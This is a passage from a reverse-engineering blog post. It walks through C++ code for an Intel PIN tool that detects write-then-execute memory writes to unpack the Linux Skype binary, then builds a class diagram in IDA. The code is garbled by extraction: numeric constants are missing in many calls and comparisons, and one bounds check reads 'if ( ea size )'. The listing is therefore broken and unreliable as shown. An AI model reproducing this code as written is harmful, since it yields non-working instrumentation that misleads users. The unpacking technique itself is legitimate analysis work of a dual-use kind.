<span class="kw1">if</span><span class="br0">(</span> PIN_Init<span class="br0">(</span>argc,argv<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> Usage<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register function to be called to instrument traces</span>
</div>
</li>
<li class="li1">
<div class="de1">
TRACE_AddInstrumentFunction<span class="br0">(</span>trace_cb, <span class="nu0"></span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register function to be called at application start time</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_AddApplicationStartFunction<span class="br0">(</span>app_start_cb, <span class="nu0"></span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Register function to be called when the application exits</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_AddFiniFunction<span class="br0">(</span>fini_cb, <span class="nu0"></span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Start the program, never returns</span>
</div>
</li>
<li class="li1">
<div class="de1">
PIN_StartProgram<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> <span class="nu0"></span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>In the “app_start_cb” function callback we will save the application’s segments in a std::map:</p>
<div class="geshi no c">
<div class="head">
(…)
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">struct</span> segdata_t
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
size_t size;
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT check;
</div>
</li>
<li class="li1">
<div class="de1">
bool written;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">typedef</span> std<span class="sy0">::</span><span class="me2">map</span> segmap_t;
</div>
</li>
<li class="li1">
<div class="de1">
segmap_t seg_bytes;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">(</span>…<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">//————————————————————————–</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">static</span> <span class="kw4">VOID</span> app_start_cb<span class="br0">(</span><span class="kw4">VOID</span> <span class="sy0">*</span>v<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
IMG img <span class="sy0">=</span> APP_ImgHead<span class="br0">(</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span><span class="br0">(</span> SEC sec<span class="sy0">=</span> IMG_SecHead<span class="br0">(</span>img<span class="br0">)</span>; SEC_Valid<span class="br0">(</span>sec<span class="br0">)</span>; sec <span class="sy0">=</span> SEC_Next<span class="br0">(</span>sec<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT sec_ea <span class="sy0">=</span> SEC_Address<span class="br0">(</span>sec<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// is the segment loaded in the process memory?</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> sec_ea <span class="sy0">!=</span> <span class="nu0"></span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT check;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// copy the first DWORD/QWORD to check if it was really changed</span>
</div>
</li>
<li class="li1">
<div class="de1">
size_t bytes <span class="sy0">=</span> PIN_SafeCopy<span class="br0">(</span><span class="sy0">&</span>amp;check, <span class="br0">(</span><span class="kw4">void</span><span class="sy0">*</span><span class="br0">)</span>sec_ea, <span class="kw4">sizeof</span><span class="br0">(</span>ADDRINT<span class="br0">)</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> bytes <span class="sy0">==</span> <span class="kw4">sizeof</span><span class="br0">(</span>ADDRINT<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> min_ea <span class="sy0">&</span>gt; sec_ea || min_ea <span class="sy0">==</span> <span class="nu0"></span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
min_ea <span class="sy0">=</span> sec_ea;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> max_ea <span class="sy0">&</span>lt; sec_ea || max_ea <span class="sy0">==</span> <span class="br0">(</span><span class="kw4">unsigned</span><span class="br0">)</span><span class="nu0">-1</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
max_ea <span class="sy0">=</span> sec_ea;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
segdata_t seg;
</div>
</li>
<li class="li1">
<div class="de1">
seg.<span class="me1">size</span> <span class="sy0">=</span> SEC_Size<span class="br0">(</span>sec<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
seg.<span class="me1">check</span> <span class="sy0">=</span> check;
</div>
</li>
<li class="li1">
<div class="de1">
seg.<span class="me1">written</span> <span class="sy0">=</span> <span class="kw2">false</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// save the segment information</span>
</div>
</li>
<li class="li1">
<div class="de1">
seg_bytes<span class="br0">[</span>sec_ea<span class="br0">]</span> <span class="sy0">=</span> seg;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>We iterate over all the segments in the application that will be loaded in the process memory and save information about them. Now, in the “trace_cb” callback, we will check in every instruction of every basic block that is going to be executed if the code modifies memory in the limits of the previously recorded segments or if the process is going to execute an instruction in a previously written application’s segment:</p>
<div class="geshi no c">
<div class="head">
//————————————————————————–
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">static</span> <span class="kw4">VOID</span> trace_cb<span class="br0">(</span>TRACE trace, <span class="kw4">VOID</span> <span class="sy0">*</span>v<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Visit every basic block in the trace</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span> <span class="br0">(</span> BBL bbl <span class="sy0">=</span> TRACE_BblHead<span class="br0">(</span>trace<span class="br0">)</span>; BBL_Valid<span class="br0">(</span>bbl<span class="br0">)</span>; bbl <span class="sy0">=</span> BBL_Next<span class="br0">(</span>bbl<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Visit every instruction in the basic block</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span><span class="br0">(</span> INS ins <span class="sy0">=</span> BBL_InsHead<span class="br0">(</span>bbl<span class="br0">)</span>; INS_Valid<span class="br0">(</span>ins<span class="br0">)</span>; ins<span class="sy0">=</span>INS_Next<span class="br0">(</span>ins<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// check if the address is in the limits of the application's segments</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT ea <span class="sy0">=</span> INS_Address<span class="br0">(</span>ins<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> <span class="sy0">!</span>valid_ea<span class="br0">(</span>ea<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">continue</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// if that address was already written and is going to be executed, we consider it's unpacked</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> was_writen<span class="br0">(</span>ea<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertCall<span class="br0">(</span>ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>check_unpacked_cb,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_INST_PTR,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_CONST_CONTEXT,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_THREAD_ID,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Instruments memory accesses using a predicated call, i.e.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// the instrumentation is called iff the instruction will actually be executed.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">//</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// The IA-64 architecture has explicitly predicated instructions. </span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// On the IA-32 and Intel(R) 64 architectures conditional moves and REP </span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// prefixed instructions appear as predicated instructions in Pin.</span>
</div>
</li>
<li class="li1">
<div class="de1">
UINT32 mem_operands <span class="sy0">=</span> INS_MemoryOperandCount<span class="br0">(</span>ins<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Iterate over each memory operand of the instruction.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span> <span class="br0">(</span> UINT32 mem_op <span class="sy0">=</span> <span class="nu0"></span>; mem_op <span class="sy0">&</span>lt; mem_operands; mem_op<span class="sy0">++</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// Note that in some architectures a single memory operand can be </span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// both read and written (for instance incl (%eax) on IA-32)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// In that case we instrument it once for read and once for write.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> INS_MemoryOperandIsWritten<span class="br0">(</span>ins, mem_op<span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// is the memory address to be modified in the limits of the application's segments?</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertIfPredicatedCall<span class="br0">(</span>ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>valid_ea,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_MEMORYOP_EA,
</div>
</li>
<li class="li1">
<div class="de1">
mem_op,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="co1">// if so, add our instrumentation code</span>
</div>
</li>
<li class="li1">
<div class="de1">
INS_InsertThenPredicatedCall<span class="br0">(</span>
</div>
</li>
<li class="li1">
<div class="de1">
ins, IPOINT_BEFORE, <span class="br0">(</span>AFUNPTR<span class="br0">)</span>record_mem_write_cb,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_INST_PTR,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_MEMORYOP_EA, mem_op,
</div>
</li>
<li class="li1">
<div class="de1">
IARG_END<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>In the “record_mem_write_cb” callback the PIN tool checks if the actual memory write affects any of the application’s segments. If so, the “written” flag of the corresponding segment element is set to true:</p>
<div class="geshi no c">
<div class="head">
//————————————————————————–
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="co1">// Handle memory write records</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> record_mem_write_cb<span class="br0">(</span><span class="kw4">VOID</span> <span class="sy0">*</span> ip, <span class="kw4">VOID</span> <span class="sy0">*</span> addr<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT ea <span class="sy0">=</span> <span class="br0">(</span>ADDRINT<span class="br0">)</span>addr;
</div>
</li>
<li class="li1">
<div class="de1">
segmap_t<span class="sy0">::</span><span class="me2">iterator</span> p;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">for</span> <span class="br0">(</span> p <span class="sy0">=</span> seg_bytes.<span class="me1">begin</span><span class="br0">(</span><span class="br0">)</span>; p <span class="sy0">!=</span> seg_bytes.<span class="me1">end</span><span class="br0">(</span><span class="br0">)</span> <span class="sy0">&</span>amp;<span class="sy0">&</span>amp; <span class="sy0">!</span>p<span class="sy0">-&</span>gt;second.<span class="me1">written</span>; <span class="sy0">++</span>p <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT start_ea <span class="sy0">=</span> p<span class="sy0">-&</span>gt;first;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> ea <span class="sy0">&</span>gt;<span class="sy0">=</span> start_ea <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
segdata_t <span class="sy0">*</span>seg <span class="sy0">=</span> <span class="sy0">&</span>amp;p<span class="sy0">-&</span>gt;second;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> ea size <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
fprintf<span class="br0">(</span>stderr, <span class="st0">"%p: W %p<span class="es0">\n</span>"</span>, ip, addr<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
write_address.<span class="me1">push_back</span><span class="br0">(</span><span class="br0">(</span>ADDRINT<span class="br0">)</span>addr<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
seg<span class="sy0">-&</span>gt;written <span class="sy0">=</span> <span class="kw2">true</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw2">break</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>And, finally, in the callback “check_unpacked_cb” that we installed in the “trace_cb” callback, we set again the “written” member to false and raise an application breakpoint that will be catch in IDA Pro:</p>
<div class="geshi no c">
<div class="head">
//————————————————————————–
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw4">VOID</span> check_unpacked_cb<span class="br0">(</span><span class="kw4">VOID</span> <span class="sy0">*</span> ip, <span class="kw4">const</span> CONTEXT <span class="sy0">*</span>ctxt, THREADID tid<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">{</span>
</div>
</li>
<li class="li1">
<div class="de1">
ADDRINT ea <span class="sy0">=</span> <span class="br0">(</span>ADDRINT<span class="br0">)</span>ip;
</div>
</li>
<li class="li1">
<div class="de1">
addrdeq_t<span class="sy0">::</span><span class="me2">iterator</span> it <span class="sy0">=</span> std<span class="sy0">::</span><span class="me2">find</span><span class="br0">(</span>write_address.<span class="me1">begin</span><span class="br0">(</span><span class="br0">)</span>, write_address.<span class="me1">end</span><span class="br0">(</span><span class="br0">)</span>, ea<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> <span class="br0">(</span> it <span class="sy0">!=</span> write_address.<span class="me1">end</span><span class="br0">(</span><span class="br0">)</span> <span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
write_address.<span class="me1">erase</span><span class="br0">(</span>it<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
fprintf<span class="br0">(</span>stderr, <span class="st0">"Layer unpacked: %p<span class="es0">\n</span>"</span>, ip<span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
PIN_ApplicationBreakpoint<span class="br0">(</span>ctxt, tid, <span class="kw2">false</span>, <span class="st0">"Layer unpacked!"</span><span class="br0">)</span>;
</div>
</li>
<li class="li1">
<div class="de1">
<span class="br0">}</span>
</div>
</li>
</ol>
</div>
<p>OK, we have our simple unpacker, it’s time to compile it, execute this PIN tool with the -appdebug command line switch, connect from IDA to PIN and let the application run. When the breakpoint is hit, the application (Skype in this case) is unpacked and we can take a memory snapshot. In the terminal where we execute the command we will see something like this:</p>
<p><code class="language-plaintext highlighter-rouge"><br />
$ ./pin -appdebug -t source/tools/MyPinTool/obj-ia32/pinpack.so -- /path/to/skype<br />
Application stopped until continued from debugger.<br />
Start GDB, then issue this command at the (gdb) prompt:<br />
target remote :47643<br />
0x83d95b9: W 0x840c35f<br />
0x840bc5e: W 0x805c050<br />
0x840bd3f: W 0x8058ed0<br />
Layer unpacked: 0x805c050<br />
</code></p>
<p>And in IDA we will receive an application breakpoint at the entry point with the message “Layer unpacked” displayed in the output window:</p>
<div id="attachment_2222" style="width: 841px" class="wp-caption aligncenter">
<a href="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt.png"><img class="size-full wp-image-2222" title="Skype finally unpacked with the PIN tool "pinpack"" src="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt.png" alt="Skype finally unpacked with the PIN tool "pinpack"" width="831" height="839" srcset="http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt.png 831w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt-150x150.png 150w, http://joxeankoret.com/blog/wp-content/uploads/2012/11/idapin_gdb_bpt-297x300.png 297w" sizes="(max-width: 831px) 100vw, 831px" /></a>
<p class="wp-caption-text">
Skype finally unpacked with the PIN tool “pinpack”
</p>
</div>
<p>And that’s all! We have a working “write and exec” unpacker in the form of a PIN tool. You can download the source code of the unpacker <a href="http://www.joxeankoret.com/download/pinpack.cpp">here</a>.</p>
<p><strong>Extra</strong></p>
<p>What I really wanted to do before writing the PIN tool was to get a classes diagram of the Skype application. Now that the application is unpacked in IDA we can easily do it (after taking a memory snapshot and re-analysing the whole database). I’ll use the <a href="http://www.hexblog.com/wp-content/uploads/2012/06/recon-2012-skochinsky-scripts.zip">scripts</a> written by Igor Skochinsky released after his <a href="http://recon.cx">RECON</a> conference <a href="http://www.hexblog.com/wp-content/uploads/2012/06/Recon-2012-Skochinsky-Compiler-Internals.pdf">“Compiler Internals: Exceptions and RTTI”</a>. I modified the script gnu_rtti.py a little to display a classes diagram in a <a href="http://www.hexblog.com/?p=106">GraphViewer</a> component in IDA (instead of a chooser) that, also, let’s you save the diagram in dot format. You can download my modified version of the script <a href="http://www.joxeankoret.com/download/gnu_rtti.py.gz">here</a>.</p>
<p>After running this script (go grab a coffee if you do it yourself as it will take a while) the classes diagram will be displayed in the GraphViewer component and we can right click in the graph and select “Export to dot”. The following is the generated classes diagram of Skype rendered with <a href="http://www.graphviz.org/">GraphViz</a>:</p>
<div style="width: 1008px" class="wp-caption aligncenter">
<a href="http://www.joxeankoret.com/img/skype.png"><img class=" " title="Skype classes diagram rendered with GraphViz" src="http://www.joxeankoret.com/img/skype.png" alt="Skype classes diagram rendered with GraphViz" width="998" height="1216" /></a>
<p class="wp-caption-text">
Skype classes diagram
</p>
</div>
<p>That’s all! I hope you liked this blog post!</p>joxeanSome time ago I wanted to take a look to Skype to see how it works and get the classes diagram of this program but, surprise: It’s packed. The Windows version is protected with a crypter of their own, (UPDATE: this statement was wrong: the last time I checked it, was protected with Themida. It was Spotify the application protected with Themida). However, as I expected, the Linux version was simply packed (not protected) and with something easy to unpack. To unpack Skype and be able to analyse it in IDA and, also, to learn a bit how Intel PIN works, I have written a PIN tool to “automatically” unpack Skype.